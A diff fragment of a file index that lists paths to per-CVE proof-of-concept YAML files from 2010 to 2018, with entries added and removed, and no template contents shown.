./poc/cve/cve-2010-1607-1752.yaml ./poc/cve/cve-2010-1607-1753.yaml ./poc/cve/cve-2010-1607-1754.yaml +./poc/cve/cve-2010-1607.yaml ./poc/cve/cve-2010-1653-1755.yaml ./poc/cve/cve-2010-1653-1756.yaml ./poc/cve/cve-2010-1653-1757.yaml ./poc/cve/cve-2010-1653-1758.yaml +./poc/cve/cve-2010-1653-1759.yaml ./poc/cve/cve-2010-1657-1760.yaml +./poc/cve/cve-2010-1657-1761.yaml ./poc/cve/cve-2010-1657-1762.yaml ./poc/cve/cve-2010-1657-1763.yaml ./poc/cve/cve-2010-1657-1764.yaml +./poc/cve/cve-2010-1657.yaml ./poc/cve/cve-2010-1658-1766.yaml ./poc/cve/cve-2010-1658-1767.yaml ./poc/cve/cve-2010-1658-1768.yaml @@ -36791,17 +36815,18 @@ ./poc/cve/cve-2010-1659-1772.yaml ./poc/cve/cve-2010-1659-1773.yaml ./poc/cve/cve-2010-1659-1774.yaml +./poc/cve/cve-2010-1659.yaml ./poc/cve/cve-2010-1714-1775.yaml ./poc/cve/cve-2010-1714-1776.yaml ./poc/cve/cve-2010-1714-1777.yaml ./poc/cve/cve-2010-1714-1778.yaml -./poc/cve/cve-2010-1714-1779.yaml ./poc/cve/cve-2010-1715-1780.yaml ./poc/cve/cve-2010-1715-1781.yaml ./poc/cve/cve-2010-1715-1782.yaml ./poc/cve/cve-2010-1715-1783.yaml ./poc/cve/cve-2010-1715-1784.yaml ./poc/cve/cve-2010-1715-1785.yaml +./poc/cve/cve-2010-1715.yaml ./poc/cve/cve-2010-1717-1786.yaml ./poc/cve/cve-2010-1717-1787.yaml ./poc/cve/cve-2010-1717-1788.yaml @@ -36845,8 +36870,6 @@ ./poc/cve/cve-2010-1875-1826.yaml ./poc/cve/cve-2010-1875-1827.yaml ./poc/cve/cve-2010-1875-1828.yaml -./poc/cve/cve-2010-1875-1829.yaml -./poc/cve/cve-2010-1878-1830.yaml ./poc/cve/cve-2010-1878-1831.yaml ./poc/cve/cve-2010-1878-1832.yaml ./poc/cve/cve-2010-1878-1833.yaml @@ -36863,11 +36886,9 @@ ./poc/cve/cve-2010-1954-1845.yaml ./poc/cve/cve-2010-1954-1846.yaml ./poc/cve/cve-2010-1954-1847.yaml -./poc/cve/cve-2010-1954-1848.yaml ./poc/cve/cve-2010-1955-1849.yaml ./poc/cve/cve-2010-1955-1850.yaml ./poc/cve/cve-2010-1955-1851.yaml -./poc/cve/cve-2010-1955-1852.yaml ./poc/cve/cve-2010-1955-1853.yaml ./poc/cve/cve-2010-1955-1854.yaml ./poc/cve/cve-2010-1956-1855.yaml @@ -36902,8 +36923,10 @@ ./poc/cve/cve-2010-1982-1883.yaml ./poc/cve/cve-2010-1982-1884.yaml ./poc/cve/cve-2010-1982-1885.yaml +./poc/cve/cve-2010-1982-1886.yaml ./poc/cve/cve-2010-1982-1887.yaml ./poc/cve/cve-2010-1982-1888.yaml +./poc/cve/cve-2010-1982.yaml ./poc/cve/cve-2010-1983-1890.yaml ./poc/cve/cve-2010-1983-1891.yaml ./poc/cve/cve-2010-1983-1892.yaml @@ -36941,10 +36964,12 @@ ./poc/cve/cve-2010-2050-1925.yaml ./poc/cve/cve-2010-2050-1926.yaml ./poc/cve/cve-2010-2050-1927.yaml +./poc/cve/cve-2010-2122-1928.yaml ./poc/cve/cve-2010-2122-1929.yaml ./poc/cve/cve-2010-2122-1930.yaml ./poc/cve/cve-2010-2122-1931.yaml ./poc/cve/cve-2010-2122-1932.yaml +./poc/cve/cve-2010-2122.yaml ./poc/cve/cve-2010-2128-1933.yaml ./poc/cve/cve-2010-2128-1934.yaml ./poc/cve/cve-2010-2128-1935.yaml @@ -36972,6 +36997,7 @@ ./poc/cve/cve-2010-2680-1957.yaml ./poc/cve/cve-2010-2680-1958.yaml ./poc/cve/cve-2010-2680-1959.yaml +./poc/cve/cve-2010-2680.yaml ./poc/cve/cve-2010-2682-1960.yaml ./poc/cve/cve-2010-2682-1961.yaml ./poc/cve/cve-2010-2682-1962.yaml @@ -36996,6 +37022,7 @@ ./poc/cve/cve-2010-2920-1981.yaml ./poc/cve/cve-2010-2920-1982.yaml ./poc/cve/cve-2010-2920-1983.yaml +./poc/cve/cve-2010-2920.yaml ./poc/cve/cve-2010-3203-1984.yaml ./poc/cve/cve-2010-3203-1985.yaml ./poc/cve/cve-2010-3203-1986.yaml @@ -37030,6 +37057,7 @@ ./poc/cve/cve-2010-4769-2014.yaml ./poc/cve/cve-2010-4769-2015.yaml ./poc/cve/cve-2010-4769-2016.yaml +./poc/cve/cve-2010-4977-2017.yaml ./poc/cve/cve-2010-4977-2018.yaml ./poc/cve/cve-2010-4977-2019.yaml ./poc/cve/cve-2010-4977-2020.yaml @@ -37037,7 +37065,6 @@ ./poc/cve/cve-2010-5028-2022.yaml ./poc/cve/cve-2010-5028-2023.yaml ./poc/cve/cve-2010-5028-2024.yaml -./poc/cve/cve-2010-5028-2025.yaml ./poc/cve/cve-2010-5278-2026.yaml ./poc/cve/cve-2010-5278-2027.yaml ./poc/cve/cve-2010-5278-2028.yaml @@ -37046,6 +37073,7 @@ ./poc/cve/cve-2010-5286-2032.yaml ./poc/cve/cve-2010-5286-2033.yaml ./poc/cve/cve-2010-5286-2035.yaml +./poc/cve/cve-2011-0049-2036.yaml ./poc/cve/cve-2011-0049-2037.yaml ./poc/cve/cve-2011-0049-2038.yaml ./poc/cve/cve-2011-0049-2039.yaml @@ -37069,7 +37097,6 @@ ./poc/cve/cve-2011-2780-2057.yaml ./poc/cve/cve-2011-2780.yaml ./poc/cve/cve-2011-3315-2058.yaml -./poc/cve/cve-2011-3315-2059.yaml ./poc/cve/cve-2011-3315-2060.yaml ./poc/cve/cve-2011-3315-2061.yaml ./poc/cve/cve-2011-4336-2062.yaml @@ -37117,6 +37144,7 @@ ./poc/cve/cve-2011-5107-2102.yaml ./poc/cve/cve-2011-5107-2103.yaml ./poc/cve/cve-2011-5107-2104.yaml +./poc/cve/cve-2011-5107.yaml ./poc/cve/cve-2011-5179-2105.yaml ./poc/cve/cve-2011-5179-2106.yaml ./poc/cve/cve-2011-5179-2107.yaml @@ -37124,7 +37152,6 @@ ./poc/cve/cve-2011-5179-2109.yaml ./poc/cve/cve-2011-5179-2110.yaml ./poc/cve/cve-2011-5179-2111.yaml -./poc/cve/cve-2011-5179.yaml ./poc/cve/cve-2011-5181-2112.yaml ./poc/cve/cve-2011-5181-2113.yaml ./poc/cve/cve-2011-5181-2114.yaml @@ -37151,24 +37178,25 @@ ./poc/cve/cve-2012-0896-2134.yaml ./poc/cve/cve-2012-0896-2135.yaml ./poc/cve/cve-2012-0896-2136.yaml -./poc/cve/cve-2012-0896.yaml ./poc/cve/cve-2012-0901-2137.yaml ./poc/cve/cve-2012-0901-2138.yaml ./poc/cve/cve-2012-0901-2139.yaml ./poc/cve/cve-2012-0901-2140.yaml ./poc/cve/cve-2012-0901-2141.yaml ./poc/cve/cve-2012-0901-2142.yaml +./poc/cve/cve-2012-0901.yaml ./poc/cve/cve-2012-0981-2143.yaml ./poc/cve/cve-2012-0981-2144.yaml ./poc/cve/cve-2012-0981-2145.yaml ./poc/cve/cve-2012-0981-2146.yaml ./poc/cve/cve-2012-0981-2147.yaml -./poc/cve/cve-2012-0981.yaml ./poc/cve/cve-2012-0991-2148.yaml ./poc/cve/cve-2012-0991-2149.yaml ./poc/cve/cve-2012-0991-2150.yaml +./poc/cve/cve-2012-0991-2151.yaml ./poc/cve/cve-2012-0991-2152.yaml ./poc/cve/cve-2012-0991-2153.yaml +./poc/cve/cve-2012-0991.yaml ./poc/cve/cve-2012-0996-2154.yaml ./poc/cve/cve-2012-0996-2155.yaml ./poc/cve/cve-2012-0996-2156.yaml @@ -37205,6 +37233,7 @@ ./poc/cve/cve-2012-4242-2186.yaml ./poc/cve/cve-2012-4242-2187.yaml ./poc/cve/cve-2012-4242-2188.yaml +./poc/cve/cve-2012-4242.yaml ./poc/cve/cve-2012-4253-2189.yaml ./poc/cve/cve-2012-4253-2190.yaml ./poc/cve/cve-2012-4253-2191.yaml @@ -37257,6 +37286,7 @@ ./poc/cve/cve-2013-2248-2236.yaml ./poc/cve/cve-2013-2248-2237.yaml ./poc/cve/cve-2013-2251-2238.yaml +./poc/cve/cve-2013-2251-2239.yaml ./poc/cve/cve-2013-2251-2240.yaml ./poc/cve/cve-2013-2251-2241.yaml ./poc/cve/cve-2013-2251-2242.yaml @@ -37284,7 +37314,6 @@ ./poc/cve/cve-2013-4117-2262.yaml ./poc/cve/cve-2013-4117-2263.yaml ./poc/cve/cve-2013-4117-2264.yaml -./poc/cve/cve-2013-4117-2265.yaml ./poc/cve/cve-2013-4625-2266.yaml ./poc/cve/cve-2013-4625-2267.yaml ./poc/cve/cve-2013-4625-2268.yaml @@ -37300,16 +37329,15 @@ ./poc/cve/cve-2013-5979-2277.yaml ./poc/cve/cve-2013-5979-2278.yaml ./poc/cve/cve-2013-5979-2279.yaml -./poc/cve/cve-2013-5979-2280.yaml ./poc/cve/cve-2013-6281-2281.yaml ./poc/cve/cve-2013-7091-2282.yaml ./poc/cve/cve-2013-7091-2283.yaml ./poc/cve/cve-2013-7091-2284.yaml +./poc/cve/cve-2013-7091-2285.yaml ./poc/cve/cve-2013-7240-2286.yaml ./poc/cve/cve-2013-7240-2287.yaml ./poc/cve/cve-2013-7240-2288.yaml ./poc/cve/cve-2013-7240-2289.yaml -./poc/cve/cve-2013-7240-2290.yaml ./poc/cve/cve-2014-10037-2291.yaml ./poc/cve/cve-2014-10037-2292.yaml ./poc/cve/cve-2014-10037-2293.yaml @@ -37333,7 +37361,6 @@ ./poc/cve/cve-2014-2962-2312.yaml ./poc/cve/cve-2014-2962-2314.yaml ./poc/cve/cve-2014-2962-2315.yaml -./poc/cve/cve-2014-3120-2316.yaml ./poc/cve/cve-2014-3120-2317.yaml ./poc/cve/cve-2014-3120-2318.yaml ./poc/cve/cve-2014-3120-2319.yaml @@ -37361,12 +37388,12 @@ ./poc/cve/cve-2014-4513-2341.yaml ./poc/cve/cve-2014-4513-2342.yaml ./poc/cve/cve-2014-4513-2343.yaml -./poc/cve/cve-2014-4513-2344.yaml ./poc/cve/cve-2014-4513-2345.yaml ./poc/cve/cve-2014-4535-2346.yaml ./poc/cve/cve-2014-4535-2347.yaml ./poc/cve/cve-2014-4535-2348.yaml ./poc/cve/cve-2014-4535-2349.yaml +./poc/cve/cve-2014-4536-2350.yaml ./poc/cve/cve-2014-4536-2351.yaml ./poc/cve/cve-2014-4536-2352.yaml ./poc/cve/cve-2014-4536-2353.yaml @@ -37411,10 +37438,12 @@ ./poc/cve/cve-2014-5258-2391.yaml ./poc/cve/cve-2014-5258-2392.yaml ./poc/cve/cve-2014-5258-2393.yaml +./poc/cve/cve-2014-5368-2394.yaml ./poc/cve/cve-2014-5368-2395.yaml ./poc/cve/cve-2014-5368-2396.yaml ./poc/cve/cve-2014-5368-2397.yaml ./poc/cve/cve-2014-5368-2398.yaml +./poc/cve/cve-2014-5368.yaml ./poc/cve/cve-2014-6271-2399.yaml ./poc/cve/cve-2014-6271-2400.yaml ./poc/cve/cve-2014-6271-2401.yaml @@ -37475,7 +37504,6 @@ ./poc/cve/cve-2015-1000012-2458.yaml ./poc/cve/cve-2015-1000012-2459.yaml ./poc/cve/cve-2015-1000012-2460.yaml -./poc/cve/cve-2015-1000012-2461.yaml ./poc/cve/cve-2015-1000012-2462.yaml ./poc/cve/cve-2015-1427-2463.yaml ./poc/cve/cve-2015-1427-2464.yaml @@ -37491,18 +37519,17 @@ ./poc/cve/cve-2015-1880-2474.yaml ./poc/cve/cve-2015-1880-2475.yaml ./poc/cve/cve-2015-1880-2476.yaml -./poc/cve/cve-2015-1880-2477.yaml ./poc/cve/cve-2015-1880-2478.yaml ./poc/cve/cve-2015-2067-2479.yaml ./poc/cve/cve-2015-2067-2480.yaml ./poc/cve/cve-2015-2067-2481.yaml -./poc/cve/cve-2015-2067-2482.yaml ./poc/cve/cve-2015-2067-2483.yaml ./poc/cve/cve-2015-2068-2484.yaml ./poc/cve/cve-2015-2068-2485.yaml ./poc/cve/cve-2015-2068-2486.yaml ./poc/cve/cve-2015-2068-2487.yaml ./poc/cve/cve-2015-2068-2488.yaml +./poc/cve/cve-2015-2080-2489.yaml ./poc/cve/cve-2015-2080-2490.yaml ./poc/cve/cve-2015-2080-2491.yaml ./poc/cve/cve-2015-2080-2492.yaml @@ -37536,7 +37563,6 @@ ./poc/cve/cve-2015-3897-2519.yaml ./poc/cve/cve-2015-3897-2520.yaml ./poc/cve/cve-2015-3897-2521.yaml -./poc/cve/cve-2015-4050-2522.yaml ./poc/cve/cve-2015-4050-2523.yaml ./poc/cve/cve-2015-4050-2524.yaml ./poc/cve/cve-2015-4050-2525.yaml @@ -37578,6 +37604,7 @@ ./poc/cve/cve-2015-5471-2562.yaml ./poc/cve/cve-2015-5531-2563.yaml ./poc/cve/cve-2015-5531-2564.yaml +./poc/cve/cve-2015-5531-2565.yaml ./poc/cve/cve-2015-5531-2566.yaml ./poc/cve/cve-2015-5688-2567.yaml ./poc/cve/cve-2015-5688-2568.yaml @@ -37632,7 +37659,6 @@ ./poc/cve/cve-2015-8399-2617.yaml ./poc/cve/cve-2015-8399-2618.yaml ./poc/cve/cve-2015-8399-2619.yaml -./poc/cve/cve-2015-8813-2620.yaml ./poc/cve/cve-2015-8813-2621.yaml ./poc/cve/cve-2015-8813-2622.yaml ./poc/cve/cve-2015-8813-2623.yaml @@ -37675,6 +37701,7 @@ ./poc/cve/cve-2016-1000131-2661.yaml ./poc/cve/cve-2016-1000131-2662.yaml ./poc/cve/cve-2016-1000131-2663.yaml +./poc/cve/cve-2016-1000131-2664.yaml ./poc/cve/cve-2016-1000131-2665.yaml ./poc/cve/cve-2016-1000132-2666.yaml ./poc/cve/cve-2016-1000132-2667.yaml @@ -37708,7 +37735,6 @@ ./poc/cve/cve-2016-1000138-2695.yaml ./poc/cve/cve-2016-1000138-2696.yaml ./poc/cve/cve-2016-1000138-2697.yaml -./poc/cve/cve-2016-1000138-2698.yaml ./poc/cve/cve-2016-1000139-2699.yaml ./poc/cve/cve-2016-1000139-2700.yaml ./poc/cve/cve-2016-1000139-2701.yaml @@ -37749,6 +37775,7 @@ ./poc/cve/cve-2016-1000154-2737.yaml ./poc/cve/cve-2016-1000154-2738.yaml ./poc/cve/cve-2016-1000154-2739.yaml +./poc/cve/cve-2016-1000154-2740.yaml ./poc/cve/cve-2016-1000155-2741.yaml ./poc/cve/cve-2016-1000155-2742.yaml ./poc/cve/cve-2016-1000155-2743.yaml @@ -37764,7 +37791,6 @@ ./poc/cve/cve-2016-10924-2754.yaml ./poc/cve/cve-2016-10924-2755.yaml ./poc/cve/cve-2016-10940-2756.yaml -./poc/cve/cve-2016-10940-2757.yaml ./poc/cve/cve-2016-10956-2758.yaml ./poc/cve/cve-2016-10956-2759.yaml ./poc/cve/cve-2016-10956-2760.yaml @@ -37780,7 +37806,6 @@ ./poc/cve/cve-2016-10993-2770.yaml ./poc/cve/cve-2016-1555-2772.yaml ./poc/cve/cve-2016-1555-2773.yaml -./poc/cve/cve-2016-2004-2774.yaml ./poc/cve/cve-2016-2004-2775.yaml ./poc/cve/cve-2016-2389-2776.yaml ./poc/cve/cve-2016-2389-2777.yaml @@ -37840,6 +37865,7 @@ ./poc/cve/cve-2017-1000028-2829.yaml ./poc/cve/cve-2017-1000028-2831.yaml ./poc/cve/cve-2017-1000028-2832.yaml +./poc/cve/cve-2017-1000029-2833.yaml ./poc/cve/cve-2017-1000029-2834.yaml ./poc/cve/cve-2017-1000029-2835.yaml ./poc/cve/cve-2017-1000029-2836.yaml @@ -37851,7 +37877,6 @@ ./poc/cve/cve-2017-1000170-2842.yaml ./poc/cve/cve-2017-1000486-2843.yaml ./poc/cve/cve-2017-1000486-2844.yaml -./poc/cve/cve-2017-1000486-2845.yaml ./poc/cve/cve-2017-1000486-2846.yaml ./poc/cve/cve-2017-1000486-2847.yaml ./poc/cve/cve-2017-10075-2848.yaml @@ -37864,7 +37889,6 @@ ./poc/cve/cve-2017-10271-2855.yaml ./poc/cve/cve-2017-10271-2856.yaml ./poc/cve/cve-2017-10271-2857.yaml -./poc/cve/cve-2017-10271-2858.yaml ./poc/cve/cve-2017-10271-2859.yaml ./poc/cve/cve-2017-10271-2860.yaml ./poc/cve/cve-2017-10974-2861.yaml @@ -37879,6 +37903,7 @@ ./poc/cve/cve-2017-11512-2871.yaml ./poc/cve/cve-2017-11512-2872.yaml ./poc/cve/cve-2017-11610-2873.yaml +./poc/cve/cve-2017-11610-2874.yaml ./poc/cve/cve-2017-11610-2875.yaml ./poc/cve/cve-2017-12138-2876.yaml ./poc/cve/cve-2017-12138-2877.yaml @@ -37894,6 +37919,7 @@ ./poc/cve/cve-2017-12542-2887.yaml ./poc/cve/cve-2017-12544-2888.yaml ./poc/cve/cve-2017-12544-2889.yaml +./poc/cve/cve-2017-12544-2890.yaml ./poc/cve/cve-2017-12544-2891.yaml ./poc/cve/cve-2017-12583-2892.yaml ./poc/cve/cve-2017-12583-2893.yaml @@ -37916,6 +37942,7 @@ ./poc/cve/cve-2017-12629-2910.yaml ./poc/cve/cve-2017-12635-2911.yaml ./poc/cve/cve-2017-12635-2912.yaml +./poc/cve/cve-2017-12635-2913.yaml ./poc/cve/cve-2017-12635-2914.yaml ./poc/cve/cve-2017-12635-2915.yaml ./poc/cve/cve-2017-12637-2916.yaml @@ -37927,7 +37954,6 @@ ./poc/cve/cve-2017-12794-2922.yaml ./poc/cve/cve-2017-12794-2923.yaml ./poc/cve/cve-2017-12794-2924.yaml -./poc/cve/cve-2017-14135-2925.yaml ./poc/cve/cve-2017-14135-2926.yaml ./poc/cve/cve-2017-14535-2927.yaml ./poc/cve/cve-2017-14535-2928.yaml @@ -37947,9 +37973,9 @@ ./poc/cve/cve-2017-14849-2943.yaml ./poc/cve/cve-2017-14849-2944.yaml ./poc/cve/cve-2017-14849-2945.yaml +./poc/cve/cve-2017-14849.yaml ./poc/cve/cve-2017-15287-2946.yaml ./poc/cve/cve-2017-15287-2947.yaml -./poc/cve/cve-2017-15363-2948.yaml ./poc/cve/cve-2017-15363-2949.yaml ./poc/cve/cve-2017-15363-2950.yaml ./poc/cve/cve-2017-15363-2951.yaml @@ -37978,12 +38004,12 @@ ./poc/cve/cve-2017-16877-2974.yaml ./poc/cve/cve-2017-17043-2975.yaml ./poc/cve/cve-2017-17043-2976.yaml -./poc/cve/cve-2017-17043-2977.yaml ./poc/cve/cve-2017-17059-2978.yaml ./poc/cve/cve-2017-17059-2979.yaml ./poc/cve/cve-2017-17059-2980.yaml ./poc/cve/cve-2017-17451-2981.yaml ./poc/cve/cve-2017-17451-2982.yaml +./poc/cve/cve-2017-17451-2983.yaml ./poc/cve/cve-2017-17562-2984.yaml ./poc/cve/cve-2017-17562-2985.yaml ./poc/cve/cve-2017-17562-2986.yaml @@ -37993,9 +38019,9 @@ ./poc/cve/cve-2017-18024-2989.yaml ./poc/cve/cve-2017-18024-2990.yaml ./poc/cve/cve-2017-18024-2991.yaml +./poc/cve/cve-2017-18024-2992.yaml ./poc/cve/cve-2017-18536-2993.yaml ./poc/cve/cve-2017-18536-2994.yaml -./poc/cve/cve-2017-18536-2995.yaml ./poc/cve/cve-2017-18598-2996.yaml ./poc/cve/cve-2017-18598-2997.yaml ./poc/cve/cve-2017-18638-2998.yaml @@ -38014,7 +38040,6 @@ ./poc/cve/cve-2017-3528-3011.yaml ./poc/cve/cve-2017-3528-3012.yaml ./poc/cve/cve-2017-3528-3013.yaml -./poc/cve/cve-2017-3528.yaml ./poc/cve/cve-2017-3881-3014.yaml ./poc/cve/cve-2017-3881-3015.yaml ./poc/cve/cve-2017-3881-3016.yaml @@ -38046,7 +38071,6 @@ ./poc/cve/cve-2017-5982-3041.yaml ./poc/cve/cve-2017-5982-3042.yaml ./poc/cve/cve-2017-6090-3043.yaml -./poc/cve/cve-2017-6090-3044.yaml ./poc/cve/cve-2017-6090-3045.yaml ./poc/cve/cve-2017-6090-3046.yaml ./poc/cve/cve-2017-6360-3047.yaml @@ -38095,6 +38119,7 @@ ./poc/cve/cve-2017-9506-3091.yaml ./poc/cve/cve-2017-9506-3092.yaml ./poc/cve/cve-2017-9506-3093.yaml +./poc/cve/cve-2017-9506.yaml ./poc/cve/cve-2017-9791-3094.yaml ./poc/cve/cve-2017-9791-3095.yaml ./poc/cve/cve-2017-9791-3096.yaml @@ -38130,17 +38155,18 @@ ./poc/cve/cve-2018-0296-3126.yaml ./poc/cve/cve-2018-0296-3127.yaml ./poc/cve/cve-2018-0296-3128.yaml +./poc/cve/cve-2018-0296.yaml ./poc/cve/cve-2018-1000129-3129.yaml ./poc/cve/cve-2018-1000129-3130.yaml ./poc/cve/cve-2018-1000129-3131.yaml ./poc/cve/cve-2018-1000129-3132.yaml ./poc/cve/cve-2018-1000129-3133.yaml -./poc/cve/cve-2018-1000129.yaml ./poc/cve/cve-2018-1000130-3134.yaml ./poc/cve/cve-2018-1000130-3135.yaml ./poc/cve/cve-2018-1000130-3136.yaml ./poc/cve/cve-2018-1000130-3137.yaml ./poc/cve/cve-2018-1000226-3138.yaml +./poc/cve/cve-2018-1000226-3139.yaml ./poc/cve/cve-2018-1000226-3140.yaml ./poc/cve/cve-2018-1000533-3142.yaml ./poc/cve/cve-2018-1000533-3143.yaml @@ -38178,6 +38204,7 @@ ./poc/cve/cve-2018-10822-3175.yaml ./poc/cve/cve-2018-10822-3176.yaml ./poc/cve/cve-2018-10822-3177.yaml +./poc/cve/cve-2018-10822-3178.yaml ./poc/cve/cve-2018-10822-3179.yaml ./poc/cve/cve-2018-10823-3180.yaml ./poc/cve/cve-2018-10823-3181.yaml @@ -38195,7 +38222,6 @@ ./poc/cve/cve-2018-11409-3193.yaml ./poc/cve/cve-2018-11409-3194.yaml ./poc/cve/cve-2018-11409-3195.yaml -./poc/cve/cve-2018-11409.yaml ./poc/cve/cve-2018-11709-3196.yaml ./poc/cve/cve-2018-11709-3197.yaml ./poc/cve/cve-2018-11709-3198.yaml @@ -38211,7 +38237,6 @@ ./poc/cve/cve-2018-11776-3207.yaml ./poc/cve/cve-2018-11776-3208.yaml ./poc/cve/cve-2018-11776-3209.yaml -./poc/cve/cve-2018-11776-3210.yaml ./poc/cve/cve-2018-11776-3211.yaml ./poc/cve/cve-2018-11776-3212.yaml ./poc/cve/cve-2018-11784-3213.yaml @@ -38223,6 +38248,7 @@ ./poc/cve/cve-2018-11784-3219.yaml ./poc/cve/cve-2018-12031-3220.yaml ./poc/cve/cve-2018-12031-3221.yaml +./poc/cve/cve-2018-12031-3222.yaml ./poc/cve/cve-2018-12054-3223.yaml ./poc/cve/cve-2018-12054-3225.yaml ./poc/cve/cve-2018-12054-3226.yaml @@ -38239,7 +38265,6 @@ ./poc/cve/cve-2018-12300-3237.yaml ./poc/cve/cve-2018-12300-3238.yaml ./poc/cve/cve-2018-12300-3239.yaml -./poc/cve/cve-2018-12300-3240.yaml ./poc/cve/cve-2018-1247-3241.yaml ./poc/cve/cve-2018-1247-3242.yaml ./poc/cve/cve-2018-1247-3243.yaml @@ -38285,7 +38310,6 @@ ./poc/cve/cve-2018-13379-3282.yaml ./poc/cve/cve-2018-13379-3283.yaml ./poc/cve/cve-2018-13379-3284.yaml -./poc/cve/cve-2018-13380-3285.yaml ./poc/cve/cve-2018-13380-3286.yaml ./poc/cve/cve-2018-13380-3287.yaml ./poc/cve/cve-2018-13380-3288.yaml @@ -38294,7 +38318,9 @@ ./poc/cve/cve-2018-13980-3291.yaml ./poc/cve/cve-2018-13980-3292.yaml ./poc/cve/cve-2018-13980-3293.yaml +./poc/cve/cve-2018-13980-3294.yaml ./poc/cve/cve-2018-13980-3295.yaml +./poc/cve/cve-2018-14013-3296.yaml ./poc/cve/cve-2018-14013-3297.yaml ./poc/cve/cve-2018-14013-3298.yaml ./poc/cve/cve-2018-14064-3299.yaml @@ -38314,22 +38340,20 @@ ./poc/cve/cve-2018-14728-3313.yaml ./poc/cve/cve-2018-14728-3314.yaml ./poc/cve/cve-2018-14728.yaml +./poc/cve/cve-2018-14912-3315.yaml ./poc/cve/cve-2018-14912-3316.yaml ./poc/cve/cve-2018-14912-3317.yaml ./poc/cve/cve-2018-14916-3318.yaml -./poc/cve/cve-2018-14916-3319.yaml ./poc/cve/cve-2018-14916-3320.yaml ./poc/cve/cve-2018-14918-3321.yaml ./poc/cve/cve-2018-14918-3322.yaml ./poc/cve/cve-2018-14931-3323.yaml ./poc/cve/cve-2018-14931-3324.yaml -./poc/cve/cve-2018-14931-3325.yaml ./poc/cve/cve-2018-15138-3326.yaml ./poc/cve/cve-2018-15138-3327.yaml ./poc/cve/cve-2018-15138-3328.yaml ./poc/cve/cve-2018-15138-3329.yaml ./poc/cve/cve-2018-15473-3330.yaml -./poc/cve/cve-2018-15473.yaml ./poc/cve/cve-2018-15517-3331.yaml ./poc/cve/cve-2018-15517-3332.yaml ./poc/cve/cve-2018-15517-3333.yaml @@ -38346,6 +38370,7 @@ ./poc/cve/cve-2018-15745-3344.yaml ./poc/cve/cve-2018-15745-3345.yaml ./poc/cve/cve-2018-15745-3346.yaml +./poc/cve/cve-2018-15961-3347.yaml ./poc/cve/cve-2018-15961-3348.yaml ./poc/cve/cve-2018-15961-3349.yaml ./poc/cve/cve-2018-16059-3350.yaml @@ -38363,6 +38388,7 @@ ./poc/cve/cve-2018-16283-3362.yaml ./poc/cve/cve-2018-16283-3363.yaml ./poc/cve/cve-2018-16283-3364.yaml +./poc/cve/cve-2018-16288-3365.yaml ./poc/cve/cve-2018-16288-3366.yaml ./poc/cve/cve-2018-16288-3367.yaml ./poc/cve/cve-2018-16288-3368.yaml @@ -38391,9 +38417,7 @@ ./poc/cve/cve-2018-16671-3391.yaml ./poc/cve/cve-2018-16671-3392.yaml ./poc/cve/cve-2018-16671-3393.yaml -./poc/cve/cve-2018-16671-3394.yaml ./poc/cve/cve-2018-16716-3395.yaml -./poc/cve/cve-2018-16716-3396.yaml ./poc/cve/cve-2018-16716-3397.yaml ./poc/cve/cve-2018-16761-3398.yaml ./poc/cve/cve-2018-16761-3399.yaml @@ -38433,7 +38457,6 @@ ./poc/cve/cve-2018-18264-3433.yaml ./poc/cve/cve-2018-18264-3434.yaml ./poc/cve/cve-2018-18264-3435.yaml -./poc/cve/cve-2018-18264.yaml ./poc/cve/cve-2018-18323-3436.yaml ./poc/cve/cve-2018-18323-3437.yaml ./poc/cve/cve-2018-18323-3438.yaml @@ -38442,7 +38465,6 @@ ./poc/cve/cve-2018-18570-3443.yaml ./poc/cve/cve-2018-18570-3444.yaml ./poc/cve/cve-2018-18570-3445.yaml -./poc/cve/cve-2018-18775-3446.yaml ./poc/cve/cve-2018-18775-3447.yaml ./poc/cve/cve-2018-18775-3448.yaml ./poc/cve/cve-2018-18775-3449.yaml @@ -38459,6 +38481,7 @@ ./poc/cve/cve-2018-18925-3461.yaml ./poc/cve/cve-2018-18925-3462.yaml ./poc/cve/cve-2018-19326-3463.yaml +./poc/cve/cve-2018-19326-3464.yaml ./poc/cve/cve-2018-19326-3465.yaml ./poc/cve/cve-2018-19365-3466.yaml ./poc/cve/cve-2018-19365-3467.yaml @@ -38481,12 +38504,9 @@ ./poc/cve/cve-2018-19458-3485.yaml ./poc/cve/cve-2018-19753-3486.yaml ./poc/cve/cve-2018-19753-3487.yaml -./poc/cve/cve-2018-19753-3488.yaml ./poc/cve/cve-2018-19877(1).yaml -./poc/cve/cve-2018-19892(1).yaml -./poc/cve/cve-2018-19914(1).yaml ./poc/cve/cve-2018-19915(1).yaml -./poc/cve/cve-2018-20009(1).yaml +./poc/cve/cve-2018-20011(1).yaml ./poc/cve/cve-2018-20062-3489.yaml ./poc/cve/cve-2018-20062-3490.yaml ./poc/cve/cve-2018-20062-3491.yaml @@ -38495,6 +38515,7 @@ ./poc/cve/cve-2018-20462-3494.yaml ./poc/cve/cve-2018-20470-3495.yaml ./poc/cve/cve-2018-20470-3496.yaml +./poc/cve/cve-2018-20470-3497.yaml ./poc/cve/cve-2018-20470-3498.yaml ./poc/cve/cve-2018-20824-3499.yaml ./poc/cve/cve-2018-20824-3500.yaml @@ -38532,9 +38553,11 @@ ./poc/cve/cve-2018-3167-3534.yaml ./poc/cve/cve-2018-3167-3535.yaml ./poc/cve/cve-2018-3167-3536.yaml +./poc/cve/cve-2018-3167.yaml ./poc/cve/cve-2018-3238-1.yaml ./poc/cve/cve-2018-3238-2.yaml ./poc/cve/cve-2018-3238-3.yaml +./poc/cve/cve-2018-3238-3537.yaml ./poc/cve/cve-2018-3238-3538.yaml ./poc/cve/cve-2018-3238-3539.yaml ./poc/cve/cve-2018-3714-3540.yaml @@ -38569,6 +38592,7 @@ ./poc/cve/cve-2018-5316-3568.yaml ./poc/cve/cve-2018-5316-3569.yaml ./poc/cve/cve-2018-5316-3570.yaml +./poc/cve/cve-2018-5715(1).yaml ./poc/cve/cve-2018-6008-3571.yaml ./poc/cve/cve-2018-6008-3572.yaml ./poc/cve/cve-2018-6008-3573.yaml @@ -38583,7 +38607,6 @@ ./poc/cve/cve-2018-6910-3582.yaml ./poc/cve/cve-2018-6910-3583.yaml ./poc/cve/cve-2018-6910-3584.yaml -./poc/cve/cve-2018-6910-3585.yaml ./poc/cve/cve-2018-6910-3586.yaml ./poc/cve/cve-2018-7251-3587.yaml ./poc/cve/cve-2018-7251-3588.yaml @@ -38615,7 +38638,6 @@ ./poc/cve/cve-2018-7602-3614.yaml ./poc/cve/cve-2018-7602-3615.yaml ./poc/cve/cve-2018-7662-3616.yaml -./poc/cve/cve-2018-7662-3617.yaml 